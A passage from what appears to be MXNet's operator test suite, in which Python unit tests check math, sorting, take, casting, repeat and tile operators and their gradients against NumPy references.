lambda x: 2.0 / math.sqrt(math.pi) * np.exp(-(x ** 2)), 0.5, 0.5)
# erfinv
mathematical_core("erfinv", lambda x: mx.sym.erfinv(x), lambda x: scipy_special.erfinv(x),
lambda x: 0.5 * math.sqrt(math.pi) * np.exp(scipy_special.erfinv(x) ** 2), 0.5, 0.5)
def rounding(name, forward_mxnet_call, forward_numpy_call, data_init=5., grad_init=2.):
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = data_init
arr_data = mx.nd.array(data_tmp)
test = forward_mxnet_call(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0]
npout = forward_numpy_call(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_mathematical():
# rsqrt
mathematical_core("rsqrt",
lambda x: mx.sym.rsqrt(x),
lambda x: 1 / np.sqrt(x),
lambda x: -(1.0 / (2.0 * x * np.sqrt(x))))
# tan
mathematical_core("tan", lambda x: mx.sym.tan(x), lambda x: np.tan(x), lambda x: np.tan(x) ** 2 + 1)
# arcsin
mathematical_core("arcsin", lambda x: mx.sym.arcsin(x), lambda x: np.arcsin(x),
lambda x: 1. / (1. - x ** 2) ** (1. / 2.), 0.5, 0.5)
# arccos
mathematical_core("arccos", lambda x: mx.sym.arccos(x), lambda x: np.arccos(x),
lambda x: -1. / (1. - x ** 2.) ** (1. / 2.), 0.5, 0.5)
# arctan
mathematical_core("arctan", lambda x: mx.sym.arctan(x), lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.), 0.5, 0.5)
# hypot
mathematical_core_binary("hypot",
lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
0.5, 0.5, 0.5)
# hypot scalar
mathematical_core("hypot scalar",
lambda x: mx.sym.hypot(x, 3),
lambda x: np.hypot(x, 3),
lambda x: x / np.hypot(x, 3),
0.5, 0.5)
# degrees
mathematical_core("degrees",
lambda x: mx.sym.degrees(x),
lambda x: np.degrees(x),
lambda x: 180./np.pi,
0.5, 0.5)
# radians
mathematical_core("radians",
lambda x: mx.sym.radians(x),
lambda x: np.radians(x),
lambda x: np.pi / 180.,
0.6, 1)
# sinh
mathematical_core("sinh", lambda x: mx.sym.sinh(x), lambda x: np.sinh(x), lambda x: np.cosh(x))
# cosh
mathematical_core("cosh", lambda x: mx.sym.cosh(x), lambda x: np.cosh(x), lambda x: np.sinh(x), 5, 5)
# tanh
mathematical_core("tanh", lambda x: mx.sym.tanh(x), lambda x: np.tanh(x), lambda x: 1. - np.tanh(x) ** 2, 0.5, 1)
# arcsinh
mathematical_core("arcsinh", lambda x: mx.sym.arcsinh(x), lambda x: np.arcsinh(x),
lambda x: 1./(x**2 + 1.)**(1./2.))
# arccosh
mathematical_core("arccosh", lambda x: mx.sym.arccosh(x), lambda x: np.arccosh(x),
lambda x: 1./(x**2 - 1.)**(1./2.))
# arctanh
mathematical_core("arctanh", lambda x: mx.sym.arctanh(x), lambda x: np.arctanh(x),
lambda x: -1./(x**2 - 1.), 0.5)
# log1p
mathematical_core("log1p", lambda x: mx.sym.log1p(x), lambda x: np.log1p(x),
lambda x: 1. / (1.0 + x), 0.5, 0.5)
# expm1
mathematical_core("expm1", lambda x: mx.sym.expm1(x), lambda x: np.expm1(x),
lambda x: np.exp(x), 0.5, 0.5)
# log10
mathematical_core("log10", lambda x: mx.sym.log10(x), lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)))
# log2
mathematical_core("log2", lambda x: mx.sym.log2(x), lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)))
# rint
rounding("rint", lambda x: mx.sym.rint(x), lambda x: np.rint(x))
# fix
rounding("fix", lambda x: mx.sym.fix(x), lambda x: np.fix(x))
@with_seed()
def test_clip():
data = mx.symbol.Variable('data')
shape = (30, 30)
data_tmp = np.random.uniform(-1, 1, shape).astype('float32')
test = mx.sym.clip(data, a_max=0.6, a_min=-0.6)
check_symbolic_forward(test, [data_tmp], [np.clip(data_tmp, -0.6, 0.6)])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)],
[np.where(data_tmp <= 0.6, [1], [0]) * np.where(data_tmp >= -0.6, [1], [0])])
# Test monitor on symbol using clip
def simple_callback(name, arr):
pass
exe = test.simple_bind(ctx=mx.current_context(), data=shape)
exe.set_monitor_callback(simple_callback, monitor_all=True)
exe.forward(is_train=True)
exe.backward(out_grads=mx.nd.ones(shape))
mx.nd.waitall()
@with_seed()
def test_init():
def test_basic_val_init(sym_func, np_func, shape, dtype):
x = sym_func(shape=shape, dtype=dtype)
exe = x.bind(default_context(), args=[], args_grad=[])
exe.forward(is_train=True)
assert_almost_equal(exe.outputs[0], np_func(shape=shape, dtype=dtype))
assert exe.outputs[0].asnumpy().dtype == dtype
def test_arange():
# General Random Tests
dtype_list = [np.float32, np.float64, np.int32, np.uint8]
config_list = [(10,),
(0, 10),
(5, 100, 4),
(50, -50, -2),
(-100, 100, 1),
(1.3, 456.6, 1.3)]
for dtype in dtype_list:
for config in config_list:
repeats = random.choice([1, 3])
np_out = np.repeat(np.arange(*config, dtype=dtype), repeats)
nd_out = mx.nd.arange(*config, repeat=repeats, dtype=dtype)
assert_almost_equal(np_out, nd_out)
def test_arange_inferstop():
s = mx.sym.arange(start=0, stop=None, infer_range=True)
s = mx.sym.elemwise_add(s, mx.sym.zeros(shape=[5]))
exe = s.bind(ctx=mx.cpu(), args={})
exe.forward()
assert_almost_equal(exe.outputs[0], np.array([0,1,2,3,4]))
def test_arange_like():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
axis_list = [0, -1]
for sh in shape_list:
for axis in axis_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0, axis=axis)
np_out = np.arange(start=0, stop=sh[axis])
assert_almost_equal(nd_out.asnumpy(), np_out)
def test_arange_like_without_axis():
shape_list = [(10,), (10, 20), (10, 20, 30), (10, 20, 30, 40)]
for sh in shape_list:
val = np.random.rand(*sh)
data = mx.nd.array(val)
nd_out = mx.nd.contrib.arange_like(data, start=0)
np_out = np.arange(start=0, stop=val.size)
assert_almost_equal(nd_out.asnumpy(), np_out.reshape(sh))
test_basic_val_init(mx.sym.zeros, np.zeros, (3, 4), np.float32)
test_basic_val_init(mx.sym.ones, np.ones, 3, np.int32)
test_basic_val_init(mx.sym.ones, np.ones, (2, 2, 3), np.float16)
test_arange()
test_arange_inferstop()
test_arange_like()
test_arange_like_without_axis()
@with_seed()
def test_order():
ctx = default_context()
def gt_topk(dat, axis, ret_typ, k, is_ascend):
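        # Ground-truth top-k: np.take with mode='wrap' lets the negative positions index argsort/sort results from the end, i.e. select the largest k for descending order.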
if ret_typ == "indices":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
elif ret_typ == "value":
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
ret = np.take(np.sort(dat, axis=axis), axis=axis, indices=indices, mode='wrap')
else:
assert dat.shape == (5, 5, 5, 5)
assert axis is None or axis == 1
ret = np.zeros(dat.shape)
if is_ascend:
indices = np.arange(k)
else:
indices = np.arange(-1, -k-1, -1)
gt_argsort = np.take(dat.argsort(axis=axis), axis=axis, indices=indices, mode='wrap')
if axis is None:
ret.ravel()[gt_argsort] = 1
else:
for i in range(5):
for j in range(5):
for k in range(5):
ret[i, gt_argsort[i, :, j, k], j, k] = 1
return ret
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(np.float32)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
def get_large_matrix():
data = np.array([np.arange(300096).astype(np.float32)])
data = np.repeat(data, 100, axis=0)
np.apply_along_axis(np.random.shuffle, 1, data)
return data
large_matrix_npy = get_large_matrix()
for axis in [1, 3, None]:
for is_ascend in [True, False]:
b = mx.sym.sort(a, axis=axis, is_ascend=is_ascend)
if axis is None:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=a_npy.size, is_ascend=is_ascend)
else:
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=5, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5,
is_ascend=is_ascend)])
b = mx.sym.argsort(a, axis=1, is_ascend=False)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=5,
is_ascend=False)])
b = mx.sym.argmax(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=False)])
b = mx.sym.argmin(a, axis=1, keepdims=True)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="indices", k=1,
is_ascend=True)])
for dtype in [np.float16, np.float32, np.float64]:
dshape = (5, 5, 5, 5)
a_npy = np.arange(np.prod(dshape)).astype(dtype)
np.random.shuffle(a_npy)
a_npy = a_npy.reshape(dshape)
a = mx.sym.Variable('a')
for axis in [1, 3, None]:
K = [1, 3, 5, 7] if axis is None else [1, 3, 5]
for k in K:
for is_ascend in [True, False]:
b = mx.sym.topk(a, axis=axis, is_ascend=is_ascend, ret_typ="value", k=k)
out_npy = gt_topk(dat=a_npy, axis=axis, ret_typ="value", k=k, is_ascend=is_ascend)
check_numeric_gradient(b, location={'a': a_npy}, numeric_eps=1e-2, ctx=ctx)
check_symbolic_forward(b, location={'a': a_npy}, expected=[out_npy])
b = mx.sym.topk(a, axis=1, is_ascend=is_ascend, ret_typ="indices", k=5)
check_symbolic_backward(sym=b, location={'a': large_matrix_npy},
out_grads=[np.random.normal(size=(100, 5))],
expected=[np.zeros((100, 300096))])
check_symbolic_forward(b, location={'a': large_matrix_npy},
expected=[gt_topk(dat=large_matrix_npy, axis=1,
ret_typ="indices", k=5, is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=3, is_ascend=is_ascend, ret_typ="indices", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 3))],
expected=[np.zeros((5, 5, 5, 5))])
                    check_symbolic_forward(b, location={'a': a_npy},
                                           expected=[gt_topk(dat=a_npy, axis=3, ret_typ="indices", k=3,
                                                             is_ascend=is_ascend)])
b = mx.sym.topk(a, axis=1, is_ascend=True, ret_typ="mask", k=3)
check_symbolic_backward(sym=b, location={'a': a_npy},
out_grads=[np.random.normal(size=(5, 5, 5, 5))],
expected=[np.zeros((5, 5, 5, 5))])
check_symbolic_forward(b, location={'a': a_npy},
expected=[gt_topk(dat=a_npy, axis=1, ret_typ="mask", k=3,
is_ascend=True)])
@with_seed()
def test_blockgrad():
a = mx.sym.Variable('a')
b = mx.sym.BlockGrad(a)
exe = b.simple_bind(ctx=default_context(), a=(10, 10))
a_npy = np.random.rand(10, 10)
exe.forward(is_train=True, a=a_npy)
assert_almost_equal(exe.outputs[0], a_npy)
exe.backward() # No error if BlockGrad works
@with_seed()
def test_take():
def grad_helper(grad_in, axis, idx):
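        # Accumulate the gradient that take() routes back to slice idx along the given axis.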
if axis == 0:
if axis == len(grad_in.shape) - 1:
grad_in[idx] += 1.0
else:
grad_in[idx, :] += 1.0
elif axis == 1:
if axis == len(grad_in.shape) - 1:
grad_in[:, idx] += 1.0
else:
grad_in[:, idx, :] += 1.0
elif axis == 2:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, idx] += 1.0
else:
grad_in[:, :, idx, :] += 1.0
elif axis == 3:
if axis == len(grad_in.shape) - 1:
grad_in[:, :, :, idx] += 1.0
else:
grad_in[:, :, :, idx, :] += 1.0
elif axis == 4:
grad_in[:, :, :, :, idx] += 1.0
else:
raise ValueError("axis %d is not supported..." % axis)
def check_output_n_grad(data_shape, idx_shape, axis, mode, out_of_range=True):
data = mx.sym.Variable('a')
idx = mx.sym.Variable('indices')
idx = mx.sym.BlockGrad(idx)
result = mx.sym.take(a=data, indices=idx, axis=axis, mode=mode)
exe = result.simple_bind(default_context(), a=data_shape,
indices=idx_shape, axis=axis, mode=mode)
data_real = np.random.normal(size=data_shape).astype('float32')
if out_of_range:
idx_real = np.random.randint(low=-data_shape[axis], high=data_shape[axis], size=idx_shape)
if mode == 'raise':
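                # make every index strictly out of range so the forward pass must raise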
idx_real[idx_real == 0] = 1
idx_real *= data_shape[axis]
else:
idx_real = np.random.randint(low=0, high=data_shape[axis], size=idx_shape)
if axis < 0:
axis += len(data_shape)
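        # np.take output shape: data_shape[:axis] + idx_shape + data_shape[axis+1:]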
grad_out = np.ones((data_shape[0:axis] if axis > 0 else ()) + idx_shape + (data_shape[axis+1:] if axis < len(data_shape) - 1 else ()), dtype='float32')
grad_in = np.zeros(data_shape, dtype='float32')
exe.arg_dict['a'][:] = mx.nd.array(data_real)
exe.arg_dict['indices'][:] = mx.nd.array(idx_real)
exe.forward(is_train=True)
if out_of_range and mode == 'raise':
try:
mx_out = exe.outputs[0].asnumpy()
            except MXNetError:
return
else:
# Did not raise exception
assert False, "did not raise %s" % MXNetError.__name__
assert_almost_equal(exe.outputs[0], np.take(data_real, idx_real, axis=axis, mode=mode))
for i in np.nditer(idx_real):
if mode == 'clip':
                i = np.clip(i, 0, data_shape[axis] - 1)  # clip to the last valid index, matching mode='clip'
grad_helper(grad_in, axis, i)
exe.backward([mx.nd.array(grad_out)])
assert_almost_equal(exe.grad_dict['a'], grad_in)
def check_autograd_req():
row_len = 2
col_len = 8
shape = (row_len, col_len)
sc = mx.nd.random.uniform(-1.0, 1.0, shape=shape, dtype="float32")
sc.attach_grad()
i = mx.nd.array([0], dtype="int64")
j = mx.nd.array([0], dtype="int64")
with mx.autograd.record(train_mode=True):
xs = []
for _ in range(row_len):
x_i = []
for _ in range(col_len):
x_ij = sc.take(i).squeeze(axis=0).take(j).squeeze(axis=0)
x_i.append(x_ij)
j = j + 1
i = i + 1
j = j - col_len # reset j
xs.append(mx.nd.stack(*x_i))
x = mx.nd.stack(*xs)
x = x.sum()
x.backward()
assert_almost_equal(np.ones(sc.grad.shape), sc.grad)
for mode in ['clip', 'wrap', 'raise']:
for data_ndim in range(1, 5):
for idx_ndim in range(1, 4):
for axis in range(-data_ndim, data_ndim):
data_shape = ()
for _ in range(data_ndim):
data_shape += (np.random.randint(low=1, high=5), )
idx_shape = ()
for _ in range(idx_ndim):
idx_shape += (np.random.randint(low=1, high=5), )
if mode == 'raise':
check_output_n_grad(data_shape, idx_shape, axis, 'raise', False)
check_output_n_grad(data_shape, idx_shape, axis, mode)
check_autograd_req()
@with_seed()
def test_grid_generator():
# transform_type = affine
test_case = [(20,21),(4,3),(6,12),(15,17)]
for target_shape in test_case:
affine_matrix = mx.sym.Variable('affine')
grid = mx.sym.GridGenerator(data=affine_matrix,transform_type='affine', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='write')
# check forward
exe.arg_dict['affine'][:] = np.array([[1.0,0,0,0,1.0,0]])
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
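        # map the normalized grid coordinates from [-1, 1] back to pixel indices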
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0]), np.arange(target_shape[1]))
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
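        # Each output pixel is A.dot([x_n, y_n, 1]) in normalized coordinates, so dL/dA = out_grad.dot(tmp.T) with tmp holding those coordinates per pixel.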
tmp = np.zeros((3,target_shape[0]*target_shape[1]))
tmp[0] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) % target_shape[1]) * (2.0 / (target_shape[1]-1))
tmp[1] = -1.0 + (np.arange(target_shape[0]*target_shape[1]) // target_shape[1]) * (2.0 / (target_shape[0]-1))
tmp[2] = 1
grad_est = np.dot(out_grad[0].reshape(2,target_shape[0]*target_shape[1]),tmp.T).reshape(1,6)
assert_almost_equal(exe.grad_dict['affine'], grad_est, rtol=1e-3, atol=1e-5)
# check addto
exe = grid.simple_bind(ctx=default_context(), affine=(1,6), grad_req='add')
grid_grad_npy = np.random.normal(size=exe.grad_dict['affine'].shape)
exe.grad_dict['affine'][:] = grid_grad_npy
exe.arg_dict['affine'][:] = np.array([[1.0, 0, 0, 0, 1.0, 0]])
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['affine'], grad_est + grid_grad_npy, rtol=1e-2, atol=1e-5)
# transform_type = warp
test_case = [(12,21),(4,3),(6,12)]
for target_shape in test_case:
flow = mx.sym.Variable('flow')
grid = mx.sym.GridGenerator(data=flow,transform_type='warp', target_shape=target_shape)
exe = grid.simple_bind(ctx=default_context(), flow=(1,2)+target_shape, grad_req='write')
# check forward
exe.arg_dict['flow'][:] = np.ones((1,2)+target_shape)
exe.forward(is_train=True)
output = exe.outputs[0].asnumpy()
output[0,0,:,:] = (output[0,0,:,:] + 1) * (target_shape[1] - 1) / 2.0
output[0,1,:,:] = (output[0,1,:,:] + 1) * (target_shape[0] - 1) / 2.0
xv, yv = np.meshgrid(np.arange(target_shape[0])+1, np.arange(target_shape[1])+1)
assert_almost_equal(output[0,0], yv.T)
assert_almost_equal(output[0,1], xv.T)
# check backward
out_grad = np.random.normal(size=(1,2)+target_shape)
exe.backward(mx.nd.array(out_grad))
grad_est = np.zeros((1,2)+target_shape)
grad_est[0,0] = out_grad[0,0] / ((target_shape[1]-1.0) / 2.0)
grad_est[0,1] = out_grad[0,1] / ((target_shape[0]-1.0) / 2.0)
assert_almost_equal(exe.grad_dict['flow'], grad_est, rtol=1e-3)
# check addto
exe_add = grid.simple_bind(ctx=default_context(), flow=(1, 2) + target_shape, grad_req='add')
flow_grad_npy = np.random.normal(size=exe_add.grad_dict['flow'].shape)
exe_add.arg_dict['flow'][:] = np.ones((1, 2) + target_shape)
exe_add.grad_dict['flow'][:] = flow_grad_npy
exe_add.forward(is_train=True)
exe_add.backward(mx.nd.array(out_grad))
assert_almost_equal(exe_add.grad_dict['flow'], grad_est + flow_grad_npy, rtol=1e-3, atol=1e-5)
@with_seed()
def test_index2d():
for _ in range(30):
n = np.random.randint(1, 100)
m = np.random.randint(1, 500)
data = mx.random.uniform(-1, 1, shape=(n, m), ctx=default_context())
x = mx.nd.array(np.random.randint(0, m, size=n), ctx=default_context(), dtype='int32')
r = mx.nd.batch_take(data, x)
assert_almost_equal(r, data.asnumpy()[np.arange(n), x.asnumpy()])
@with_seed()
def test_cast():
for srctype in [np.int32, np.float32, np.float16]:
for dsttype in [np.float32, np.int32, np.float16]:
x = mx.sym.Variable('x', dtype=srctype)
y = mx.sym.Cast(x, dtype=dsttype)
exe = y.simple_bind(ctx=default_context(), x=(10, 10))
assert exe.arg_arrays[0].dtype == srctype
assert exe.outputs[0].dtype == dsttype
X = np.random.uniform(-10, 10, size=(10, 10))
exe.arg_arrays[0][:] = X
exe.forward(is_train=True)
exe.backward(mx.nd.array(X, dtype=dsttype, ctx=default_context()))
assert_almost_equal(exe.outputs[0], X.astype(srctype).astype(dsttype), rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_arrays[0], X.astype(dsttype).astype(srctype), rtol=1e-3, atol=1e-5)
def get_cast_op_data():
FP16_FRACTION_BITS = 10
FP32_FRACTION_BITS = 23
FP32_EXP_MIN = -126
FP32_EXP_MAX = 127
# generate test cases in the vicinity of representable float16 mantissas
# and mid-way between them, but over the full range of float32 exponents.
for sign_bit in [0, 1]:
for exponent in range(FP32_EXP_MIN - FP32_FRACTION_BITS - 1, FP32_EXP_MAX + 2):
denominator = 2**(FP16_FRACTION_BITS + 1)
for numerator in range(0, denominator):
fraction = numerator / float(denominator)
for y in [-1.0, 0.0, 1.0]:
small_delta = y / 2**FP32_FRACTION_BITS
val = (-1.0)**sign_bit * 2.0**exponent * (1.0 + fraction + small_delta)
yield val
# Add np.nan as a final data value to process
yield np.nan
# Test requires all platforms to round float32->float16 with same round-to-nearest-even policy.
@with_seed()
def test_cast_float32_to_float16():
input_np = np.array(list(get_cast_op_data())).astype(np.float32)
# The intermediate cast to np.float64 below gets around a numpy rounding bug that is fixed
# as of numpy 1.17 by PR https://github.com/numpy/numpy/pull/12722
expected_output = input_np.astype(np.float64).astype(np.float16)
def check_cast(op, input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float32)
sym = op(x, dtype=np.float16)
ctx = default_context()
exe = sym.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float32, ctx=ctx)})
assert exe.arg_arrays[0].dtype == np.float32
assert exe.outputs[0].dtype == np.float16
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
for fp32_val, model_fp16_val, np_fp16_val in zip(input_np, sym_output, expected_output):
assert (model_fp16_val == np_fp16_val) or \
(np.isnan(model_fp16_val) and np.isnan(np_fp16_val)), \
'fp32->fp16 cast mismatch: with fp32 value {}, model_fp16 = {}, numpy_fp16 = {}'.format(
fp32_val, model_fp16_val, np_fp16_val)
check_cast(mx.sym.Cast, input_np, expected_output)
check_cast(mx.sym.amp_cast, input_np, expected_output)
@with_seed()
def test_amp_multicast():
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx),
'y': mx.nd.random.uniform(shape=(3, 3), dtype=np.float32, ctx=ctx),
'z': mx.nd.random.uniform(shape=(3, 3), dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
out1, out2, out3 = exe.outputs
assert out1.asnumpy().dtype == np.float32
assert out2.asnumpy().dtype == np.float32
assert out3.asnumpy().dtype == np.float32
def check_amp_multicast(input_np, expected_output):
x = mx.sym.Variable('x', dtype=np.float16)
y = mx.sym.Variable('y', dtype=np.float32)
z = mx.sym.Variable('z', dtype=np.float16)
ctx = default_context()
res = mx.sym.amp_multicast(x, y, z, num_outputs=3)
exe = res.bind(ctx, {'x': mx.nd.array(input_np, dtype=np.float16, ctx=ctx),
'y': mx.nd.array(input_np, dtype=np.float32, ctx=ctx),
'z': mx.nd.array(input_np, dtype=np.float16, ctx=ctx)})
exe.forward(is_train=True)
sym_output = exe.outputs[0].asnumpy()
        for in_val, model_fp32_val, np_fp32_val in zip(input_np, sym_output, expected_output):
            assert (model_fp32_val == np_fp32_val) or \
                   (np.isnan(model_fp32_val) and np.isnan(np_fp32_val)), \
                   'fp16->fp32 multicast mismatch: with input value {}, model_fp32 = {}, numpy_fp32 = {}'.format(
                       in_val, model_fp32_val, np_fp32_val)
input_np = np.array(list(get_cast_op_data()), dtype=np.float16)
expected_output = input_np.astype(np.float32)
check_amp_multicast(input_np, expected_output)
@with_seed()
def test_all_finite():
data = mx.sym.Variable("data", dtype=np.float32)
data2 = mx.sym.Variable("data2", dtype=np.float32)
finite_arr = mx.nd.array([[0, 0]])
inf_arr = mx.nd.array([[np.inf, np.inf]])
z = mx.sym.all_finite(data)
ctx = default_context()
exe = z.bind(ctx, {'data': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
exe = z.bind(ctx, {'data': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': inf_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 0
z = mx.sym.multi_all_finite(data, data2, num_arrays=2)
exe = z.bind(ctx, {'data': finite_arr, 'data2': finite_arr})
exe.forward(is_train=False)
sym_output = exe.outputs[0].asnumpy()
assert sym_output[0] == 1
@with_seed()
def test_repeat():
def test_repeat_forward():
ndim_max = 6 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
repeats = 3
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(0, ndim):
shape += (np.random.randint(1, size_max+1), )
a = np.random.random_sample(size=shape)
aa = np.repeat(a, repeats)
b = mx.nd.array(a, ctx=default_context())
bb = mx.nd.repeat(b, repeats)
assert_almost_equal(aa, bb)
for axis in range(0, ndim):
aa = np.repeat(a, repeats, axis)
bb = mx.nd.repeat(b, repeats, axis)
assert_almost_equal(aa, bb)
def test_repeat_backward(axis):
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=axis)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * repeats)
if axis == 0:
npout_grad = npout_grad.reshape(n1 * repeats, n2)
elif axis == 1:
npout_grad = npout_grad.reshape(n1, n2 * repeats)
else:
raise RuntimeError("Invalid axis value")
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
if axis == 0:
for i in range(shape[0]):
for j in range(shape[1]):
k = i * repeats
expected_grad[i][j] = sum(npout_grad[k:k + repeats, j])
elif axis == 1:
for j in range(shape[1]):
for i in range(shape[0]):
k = j * repeats
expected_grad[i][j] = sum(npout_grad[i, k:k + repeats])
else:
raise RuntimeError("Invalid axis value")
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_repeat_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 3
n2 = 4
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
repeats = 2
test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
@with_seed()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
@with_seed()
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test.bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
